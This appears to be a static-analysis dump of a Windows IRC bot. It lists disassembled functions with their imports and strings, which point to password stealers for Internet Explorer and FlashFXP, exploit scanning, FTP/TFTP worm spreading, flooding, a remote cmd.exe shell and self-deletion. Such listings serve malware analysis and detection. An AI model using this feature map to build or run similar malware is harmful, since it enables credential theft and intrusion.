sub_outside(): MSVCRT.sprintf MSVCRT.strcpy MSVCRT.strlen MSVCRT.exit |
sub_401146(00cc): MSVCRT.strlen |
sub_414600(00db): MSVCRT.atoi MSVCRT.malloc MSVCRT.strncpy MSVCRT.memcpy |
sub_40D53F(0509): MSVCRT.sprintf MSVCRT.strcat MSVCRT._vsnprintf MSVCRT.strlen "NOTICE %s :" "PRIVMSG %s :" "\r\n" |
sub_4043E9(05b8): MSVCRT.strcpy "80" |
sub_409DD0(060f): MSVCRT.memcpy MSVCRT.free MSVCRT.printf "ICMP.DLL" "IcmpCreateFile" "IcmpSendEcho" "IcmpCloseHandle" "Could not resolve name" |
sub_41673F(09bb): MSVCRT.fopen MSVCRT.fseek MSVCRT.ftell MSVCRT.fclose "rb" |
sub_40A1A7(0b5b): MSVCRT.malloc MSVCRT.memcpy MSVCRT.strcpy MSVCRT.atoi MSVCRT.free |
sub_4093B6(0cc7): MSVCRT.free "btg" "thread" |
sub_41665C(0cdf): MSVCRT.malloc MSVCRT.atoi MSVCRT.memcpy |
sub_40D4AB(1035): MSVCRT.sprintf MSVCRT._vsnprintf MSVCRT.strcat MSVCRT.strlen "PRIVMSG %s :" "\r\n" |
sub_40260D(1182): MSVCRT.malloc MSVCRT.strncpy MSVCRT.memcpy |
sub_407ACA(11fc): MSVCRT.strlen MSVCRT._strnicmp |
sub_4020C2(1225): MSVCRT.memcpy MSVCRT.free MSVCRT.strlen MSVCRT.strcpy WS2_32.getnameinfo MSVCRT._itoa MSVCRT.fopen MSVCRT.fseek MSVCRT.ftell MSVCRT.fclose MSVCRT.clock MSVCRT.fread "rb" "DCC Send %s (%s)" |
sub_409226(1371): MSVCRT.ceil MSVCRT._ftol |
sub_40732D(1413): MSVCRT.memcpy MSVCRT.free MSVCRT.strncmp MSVCRT.memset MSVCRT._itoa |
sub_415AF0(1472): MSVCRT.malloc "Internet explorer password stealer" |
sub_406D90(1503): MSVCRT.strcpy MSVCRT.strlen MSVCRT.malloc ".bat" "@echo off\r\n:deleteagain\r\ndel /A:H /F %s"... "open" |
sub_4088FC(152c): MSVCRT.strcpy MSVCRT._snprintf MSVCRT.strlen MSVCRT.clock MSVCRT._ftol "80" "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n" |
sub_41349C(174d): MSVCRT.memcpy MSVCRT.free MSVCRT.memset MSVCRT.strcpy MSVCRT._stricmp MSVCRT.sprintf MSVCRT.clock MSVCRT.strcmp MSVCRT.malloc |
sub_406B81(1758): MSVCRT.strcat |
sub_4018AF(191b): MSVCRT.clock MSVCRT.sprintf |
sub_40E9C9(19ab): MSVCRT.strlen |
sub_4038BA(19c2): MSVCRT.strlen MSVCRT._itoa MSVCRT.strcpy "udp" |
sub_4143B0(1a5b): MSVCRT.memcpy MSVCRT.free MSVCRT.clock MSVCRT._itoa |
sub_4041B7(1b73): MSVCRT.strncmp |
sub_403FE5(1c3c): MSVCRT.malloc |
sub_4024F3(213d): MSVCRT.atoi MSVCRT.malloc MSVCRT.strncpy MSVCRT.memcpy |
sub_4064BF(2141): MSVCRT.malloc MSVCRT.memcpy |
sub_4087C4(256f): MSVCRT.malloc |
sub_4092A4(29ef): MSVCRT.ceil MSVCRT._ftol |
sub_409AD5(2e4e): MSVCRT.memcpy MSVCRT.free |
sub_409C36(3457): MSVCRT.memset KERNEL32.InitializeCriticalSectionAndSpinCount |
sub_412F07(34bf): MSVCRT.malloc MSVCRT.atoi MSVCRT._itoa |
sub_407F3D(3635): MSVCRT.sprintf |
sub_407E0C(37d0): MSVCRT._itoa MSVCRT.atoi MSVCRT.strcpy |
sub_40A8AD(3823): MSVCRT.strlen MSVCRT.tolower "abcdef" |
sub_4017AA(38c5): MSVCRT.strlen MSVCRT.malloc MSVCRT.strncpy "Listing" "Killing" |
sub_40764D(3944): MSVCRT.memcpy MSVCRT.free MSVCRT.malloc MSVCRT.strcpy |
sub_404CBB(3da8): MSVCRT.free |
sub_4044F7(3f01): WS2_32.getnameinfo |
sub_401D39(4162): MSVCRT.strlen |
sub_412E04(4474): MSVCRT.memcpy MSVCRT.free MSVCRT.strcpy |
sub_410B52(4512): MSVCRT.memcpy MSVCRT.memset |
sub_410649(4781): MSVCRT.memcpy MSVCRT.memset |
sub_40422A(484d): MSVCRT.atoi |
sub_416EAF(4878): MSVCRT._CxxThrowException |
sub_40F040(4949): MSVCRT.memmove MSVCRT._rotr |
sub_401E38(4a2b): MSVCRT.memcpy MSVCRT.free MSVCRT.fopen MSVCRT.fclose MSVCRT.clock MSVCRT.fwrite MSVCRT.ftell |
sub_406C51(4aab): MSVCRT.strcat "Software\\Microsoft\\Windows\\CurrentVersi"... |
sub_414052(4fa7): MSVCRT.memcpy MSVCRT.free MSVCRT.strcpy MSVCRT.strcat MSVCRT.strlen MSVCRT.sprintf "Exploit statistics - " |
sub_40332B(52e1): "EXCEPTION_OTHER" "EXCEPTION_ACCESS_VIOLATION" "EXCEPTION_BREAKPOINT" "EXCEPTION_ILLEGAL_INSTRUCTION" "EXCEPTION_INT_DIVIDE_BY_ZERO" "EXCEPTION_NONCONTINUABLE_EXCEPTION" "EXCEPTION_STACK_OVERFLOW" "EXCEPTION_FLT" "Restarting" "Continuing" "open" "QUIT :exitting" "QUIT :restarting" "QUIT :restarting" |
sub_40D043(5675): MSVCRT.strcpy MSVCRT.sprintf "PASS %s" "USER %s %s %s :%s" "UNK" "B" "A" "G" "%c%s%c%c%u%c%u%s%c%c%c" |
sub_411BBC(5919): MSVCRT.memcpy MSVCRT.free MSVCRT._itoa "127.0.0.1" |
sub_410422(5969): MSVCRT.clock |
sub_414A1E(5a21): MSVCRT.memcpy MSVCRT.free MSVCRT.fopen MSVCRT.fseek MSVCRT.ftell MSVCRT.malloc MSVCRT.fclose MSVCRT.fread MSVCRT.strstr MSVCRT.sscanf "rb" "\r\n\r\n[" "\r\nIP=" "\r\nPort=" "\r\nUser=" "\r\nPass=" "[%[^]]]\r\n" "\r\nIP=%127s\r\n" "\r\nPort=%127s\r\n" "\r\nUser=%127s\r\n" "\r\nPass=%127s\r\n" |
sub_416711(5c60): MSVCRT.fopen MSVCRT.fclose "rb" |
sub_413FE7(5e87): MSVCRT.malloc MSVCRT.memcpy "Attempting to exploit IP's in list." |
sub_4125DF(5f39): MSVCRT.memcpy |
sub_40A4A4(5f9a): MSVCRT.memcpy MSVCRT.free |
sub_401000(60e1): MSVCRT.strcpy |
sub_407148(629b): MSVCRT.strcat MSVCRT._stricmp "QUIT :%s uninstalled." "Windows DLL Loader" "QUIT :%s uninstalled." |
sub_409763(6316): MSVCRT.memset |
sub_404FD0(640e): MSVCRT.free |
sub_404D10(64b3): MSVCRT.malloc |
sub_40EF59(6597): MSVCRT.memcpy MSVCRT._rotl |
sub_4091E2(65f1): MSVCRT.malloc "Driveinfo thread" |
sub_404552(67ed): MSVCRT._itoa |
sub_4097A7(69ab): MSVCRT.atoi MSVCRT._snprintf "*%s*" |
sub_40938F(6a12): MSVCRT.malloc |
sub_4083AD(6a7b): MSVCRT.memcpy MSVCRT.free MSVCRT._snprintf "?" "no SP" "95" "NT" "98" "ME" "2000" "XP" "2003" "Yes" "No" "HARDWARE\\DESCRIPTION\\System\\CentralProc"... "ProcessorNameString" |
sub_41294E(6af9): MSVCRT.memcpy |
sub_41308F(6de7): MSVCRT.strstr MSVCRT._strnicmp MSVCRT.sscanf "OPTIONS / HTTP/1.0\r\n\r\n" "Server:" "Microsoft-IIS" "Microsoft-IIS/%u.%u" "Apache" |
sub_414EB0(6e80): MSVCRT.malloc "FlashFXP password stealer" |
sub_4147E5(6ee3): MSVCRT.sscanf "yA36zA48dEhfrvghGRg57h5UlDv3" "yA36zA48dEhfrvghGRg57h5UlDv3" |
sub_408B30(70db): MSVCRT.memcpy MSVCRT.free MSVCRT.strcpy WS2_32.getaddrinfo WS2_32.getnameinfo WS2_32.freeaddrinfo WININET.InternetGetConnectedStateExA MSVCRT._snprintf "Unknown" "Unknown" "Modem" "LAN" "Yes" "No" "Yes" "No" "Bad" "Avarage" "Good" |
sub_404FE7(7226): MSVCRT.memset WS2_32.getaddrinfo WS2_32.freeaddrinfo |
sub_41417D(726a): MSVCRT.malloc "Listing exploit statistics" |
sub_4142BF(74ca): MSVCRT.atoi MSVCRT.malloc "80" |
sub_404612(76e6): WS2_32.getaddrinfo WS2_32.getnameinfo MSVCRT.strcpy WS2_32.freeaddrinfo |
sub_404193(7992): MSVCRT._itoa |
sub_409318(7bc1): MSVCRT.ceil MSVCRT._ftol |
sub_40D734(7c17): "mIRC" |
sub_411DC5(819f): MSVCRT.memcpy MSVCRT.free MSVCRT.memset MSVCRT.fopen MSVCRT.fseek MSVCRT.ftell MSVCRT.strlen MSVCRT.strncmp MSVCRT.fread MSVCRT.fclose "rb" "octet" "octet" "wormride" |
sub_404D9B(81c4): MSVCRT.memcpy |
sub_401D6E(859f): MSVCRT.malloc MSVCRT.strcat "open" "Remote cmd thread" "\r\n" "Error while executing command." |
sub_4050EA(87ab): MSVCRT.memset WS2_32.getaddrinfo WS2_32.freeaddrinfo |
sub_40F26E(88cb): MSVCRT.memset |
sub_40A50E(88d5): MSVCRT.malloc MSVCRT.strcpy MSVCRT.memcpy |
sub_41113B(8dbe): MSVCRT._snprintf MSVCRT.strlen MSVCRT.sscanf MSVCRT.fopen MSVCRT.fseek MSVCRT.ftell MSVCRT.fclose "%u,%u,%u,%u,%u,%u" "rb" "150 -\r\n" "rb" "-x 3 2000 fh 1024 Jan 1 0:00 .\r\ndrwxr-x"... "150 -\r\n" "ftp" "221 -\r\n" "231 -\r\n" |
sub_414EF4(8f0e): MSVCRT.memcpy MSVCRT.free MSVCRT.strlen MSVCRT.strstr MSVCRT.memset "%x" "%ws" "220d5cc1" "5e7e8100" ":" ":" ":" "b9819c52" "e161255a" "StringIndex" |
sub_4094E6(8f32): MSVCRT.strcpy "thread" |
sub_40CF2F(913e): MSVCRT.strcpy "6667" |
sub_405F67(9314): MSVCRT.memset MSVCRT.memcpy |
sub_4055E5(93f0): MSVCRT.memcpy MSVCRT.free MSVCRT.memset MSVCRT.atoi MSVCRT.sprintf MSVCRT.strlen "%u\r\n" "%u.%u.%u.%u:%u\r\n" "%u\r\n" "%u.%u.%u.%u:%u\r\n" "%u\r\n" "%u.%u.%u.%u:%u\r\n" "%u\r\n" "%u.%u.%u.%u:%u\r\n" |
sub_407928(94bd): MSVCRT.memset MSVCRT.strcpy |
sub_405E45(94e4): MSVCRT.malloc MSVCRT.atoi "LG flooder" |
sub_408E4A(95bf): MSVCRT.malloc |
sub_40CEB0(975e): MSVCRT.malloc "Executing command(s): %s" |
sub_408808(983f): MSVCRT.strcpy MSVCRT.clock "80" |
sub_415DFD(9871): MSVCRT.malloc "Listing interesting processes" |
sub_4124A0(987b): MSVCRT.memcpy MSVCRT.atoi |
sub_404871(9b8d): MSVCRT.memcpy MSVCRT.free |
sub_403260(9c33): MSVCRT.malloc MSVCRT.strcat |
sub_41331E(9eb7): MSVCRT.memcpy MSVCRT.free MSVCRT.strcpy MSVCRT._itoa |
sub_40D7E5(9f9d): MSVCRT.strlen |
sub_403588(a1a9): MSVCRT.malloc MSVCRT.memset MSVCRT.atoi MSVCRT.memcpy |
sub_408342(a362): MSVCRT._stricmp |
sub_40D420(a5e3): MSVCRT.sprintf MSVCRT._vsnprintf MSVCRT.strcat MSVCRT.strlen "NOTICE %s :" "\r\n" |
sub_412720(a6d1): MSVCRT.strcpy MSVCRT.memcpy |
sub_408F2E(ab4d): MSVCRT.memcpy MSVCRT.free MSVCRT.memset MSVCRT.strcat "Drive information - " "removable" "fixed" "remote" "cd-rom" "ramdisk" "unknown" |
sub_401981(ac1d): MSVCRT.memcpy MSVCRT.free MSVCRT.clock MSVCRT.memset "cmd.exe" "Could not read data from process." "Cmd.exe process has terminated." |
sub_4127D0(aca4): MSVCRT.strcmp MSVCRT.fopen MSVCRT.fread MSVCRT.fclose "rb" |
sub_40F159(adbe): MSVCRT.memcpy |
sub_40449C(aeb4): WS2_32.getnameinfo |
sub_415B60(af11): MSVCRT.memcpy MSVCRT.free MSVCRT._strnicmp MSVCRT.strcmp "Unreal3" "World Of Warcraft" "[Conquer]" "SOFTWARE\\Microsoft\\VisualStudio\\6.0\\Set"... "Software\\Valve\\Steam" "Yes" "No" "Yes" "No" "Yes" "No" "Yes" "No" "Yes" "No" |
sub_406643(b583): MSVCRT.atoi |
sub_403DF3(b5a9): MSVCRT.memcpy MSVCRT.free MSVCRT.strlen MSVCRT.strcpy MSVCRT.strcat " : USERID : UNIX : " "\r\n" |
sub_413AB0(b5b6): MSVCRT.strcpy MSVCRT._stricmp MSVCRT.atoi MSVCRT.malloc MSVCRT.memcpy |
sub_40CA29(b7e9): MSVCRT.strstr MSVCRT.sscanf MSVCRT.atoi MSVCRT._stricmp ")" "&&" "%32s %16s %32s" "$uptime" "$version" "$free" "$latency" "$firewall" "$ipv6" "$uptime" "$version" "$free" "$latency" "$firewall" "$ipv6" "==" "!=" ">" ">=" "<=" "&&" |
sub_4148CE(b829): MSVCRT.strcpy MSVCRT.strcat MSVCRT.fopen MSVCRT.sprintf "SOFTWARE\\Classes\\Applications\\FlashFXP."... "sites.dat" "ProgramFiles" "\\FlashFXP\\sites.dat" "rb" "%sFlashFXP\\sites.dat" "rb" |
sub_40806A(b9eb): MSVCRT.strcpy MSVCRT.sprintf |
sub_40D6CB(ba86): MSVCRT._vsnprintf MSVCRT.strcat MSVCRT.strlen "\r\n" |
sub_406CF8(ba88): MSVCRT.strlen |
sub_4078A0(bc64): MSVCRT.strlen |
sub_409BF1(bc92): MSVCRT.malloc MSVCRT.free |
sub_410318(bce2): MSVCRT.clock |
sub_4046BC(bcec): MSVCRT.malloc MSVCRT.memset WS2_32.getaddrinfo MSVCRT.free WS2_32.freeaddrinfo |
sub_411D68(bd90): MSVCRT.malloc "FTP wormride thread" |
sub_40EC96(be71): MSVCRT.strlen |
sub_415F69(bf55): MSVCRT.memcpy MSVCRT.free MSVCRT.memset MSVCRT.atoi MSVCRT.strlen MSVCRT.sprintf |
sub_4123F6(bf6b): MSVCRT.malloc "TFTP wormride thread" |
sub_41043F(bfa2): MSVCRT.clock |
sub_410483(bfa2): MSVCRT.clock |
sub_410461(bfa2): MSVCRT.clock |
sub_40E618(c143): MSVCRT._stricmp MSVCRT.strcmp "302" "PRIVMSG" "NOTICE" |
sub_406041(c2bf): MSVCRT.malloc MSVCRT.realloc MSVCRT.free MSVCRT.memset MSVCRT.strcpy MSVCRT.strncpy MSVCRT.strlen "system" |
sub_409CB1(c41b): IPHLPAPI.IcmpCreateFile MSVCRT.printf MSVCRT.memset IPHLPAPI.IcmpSendEcho IPHLPAPI.IcmpCloseHandle "Could not get a valid ICMP handle\n" |
sub_409479(c505): MSVCRT.malloc MSVCRT._beginthreadex MSVCRT.free |
sub_406A23(c753): MSVCRT.strcat MSVCRT.strcpy MSVCRT.fopen MSVCRT.fwrite MSVCRT.fclose |
sub_406E8E(c805): MSVCRT.strcat MSVCRT._stricmp MSVCRT.memset MSVCRT.exit "Windows DLL Loader" |
sub_402A32(c93b): MSVCRT.memcpy MSVCRT.free MSVCRT.strcpy MSVCRT._strnicmp MSVCRT.strlen MSVCRT.strstr MSVCRT.clock "http://" "80" "ftp://" "21" "anonymous" "anonymous" "tftp://" "69" ":" "/" "open" |
sub_406509(ceef): MSVCRT.atoi MSVCRT.malloc MSVCRT.free |
sub_4098F3(d7a4): MSVCRT.atoi MSVCRT.memset MSVCRT._snprintf "*%s*" |
sub_405FA3(d81a): "psapi.dll" "EnumProcessModules" "GetModuleFileNameExA" "GetModuleInformation" |
sub_4077DD(d893): MSVCRT._itoa MSVCRT.malloc MSVCRT.strcpy MSVCRT.memcpy |
sub_4045B2(db0b): MSVCRT._itoa |
sub_40C93C(dd51): MSVCRT.memcpy MSVCRT.free MSVCRT._snprintf ";" "link!link@link PRIVMSG %s :%s" ";" |
sub_408E8E(e076): MSVCRT.memset |
sub_402698(e10f): MSVCRT._snprintf MSVCRT.strlen MSVCRT.strstr MSVCRT.sscanf MSVCRT.fopen MSVCRT.fwrite MSVCRT.fclose "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n" "\r\n\r\n" "Content-Length: %u\r\n" |
sub_40637C(e198): MSVCRT.memcpy MSVCRT.free |
sub_41102F(e43a): MSVCRT.fopen MSVCRT.fread MSVCRT.fclose "rb" |
sub_406722(e784): MSVCRT._strnicmp MSVCRT.strlen MSVCRT.strcpy MSVCRT.memcpy MSVCRT.malloc MSVCRT.sprintf MSVCRT.strcat MSVCRT.free "HKCR" "HKCU" "HKLM" "HKUS" |
sub_401244(ecac): MSVCRT.memcpy MSVCRT.free MSVCRT.malloc MSVCRT._stricmp |
sub_406AE7(f004): MSVCRT.strcat MSVCRT.strcpy MSVCRT.fopen MSVCRT.fclose "rb" |
sub_4141C1(f105): MSVCRT.memcpy MSVCRT.free MSVCRT.clock |
sub_40D871(f33c): MSVCRT._stricmp MSVCRT.strlen MSVCRT.strcpy MSVCRT.memset MSVCRT.atoi MSVCRT.sprintf MSVCRT.strcmp MSVCRT.strncpy MSVCRT.strstr MSVCRT._snprintf "PING" "PONG %s" "PONG" "MODE" "PRIVMSG" "SEND" "eggdrop v1.6.16" "433" "UNK" "B" "A" "G" "%c%s%c%c%u%c%u%s%c%c%c" "ERROR" "JOIN" "MODE %s +smntu" "001" "MODE %s +xi" "USERHOST %s" "USERHOST %s" "451" "302" "@" "NICK" "332" "][" "link!link@link PRIVMSG %s :%s" "][" "PRIVMSG" "NOTICE" "*" |
sub_40A9CF(f341): MSVCRT.strcpy MSVCRT.memcpy MSVCRT.strlen MSVCRT.strcmp MSVCRT.malloc MSVCRT.free MSVCRT.clock MSVCRT.atoi MSVCRT._stricmp WS2_32.getaddrinfo WS2_32.getnameinfo WS2_32.freeaddrinfo MSVCRT.memcmp MSVCRT.memset MSVCRT._strnicmp "This build is fully functional" "This build is broken and will not funct"... "It took me %ums." "on" "off" "on" "QUIT :exitting" "open" "QUIT :restarting" "QUIT :changing server" "2002" "9252" "id" "username" |
sub_403BD3(f523): "kernel32.dll" "InitializeCriticalSectionAndSpinCount" "netapi32.dll" "NetUseAdd" "NetUseDel" "NetUserEnum" "NetShareEnum" "NetRemoteTOD" "NetApiBufferFree" "NetScheduleJobAdd" "NetAddAlternateComputerName" "mpr.dll" "WNetAddConnection2A" "WNetAddConnection2W" "WNetCancelConnection2A" "WNetCancelConnection2W" "ws2_32.dll" "getaddrinfo" "getnameinfo" "freeaddrinfo" "pstorec.dll" "PStoreCreateInstance" "wininet.dll" "InternetGetConnectedStateExA" |
sub_413CB3(f55e): MSVCRT.memcpy MSVCRT.free MSVCRT.malloc |
sub_4095A4(f614): MSVCRT.free MSVCRT.vsprintf MSVCRT._beginthreadex MSVCRT.memset |
sub_4103F5(f653): MSVCRT.clock |
sub_40D74D(f68e): MSVCRT.sprintf "mIRC" |
sub_412A3A(f743): MSVCRT.memcpy MSVCRT.memset |
sub_40A2D2(f744): MSVCRT.strlen MSVCRT.strcmp |
sub_4129CA(f764): MSVCRT.strcpy "unknown" |
sub_403BBD(f784): MSVCRT.free |
sub_411A09(f84c): MSVCRT.strcmp MSVCRT.sprintf MSVCRT.strlen |
sub_40636E(ffbf): MSVCRT.free |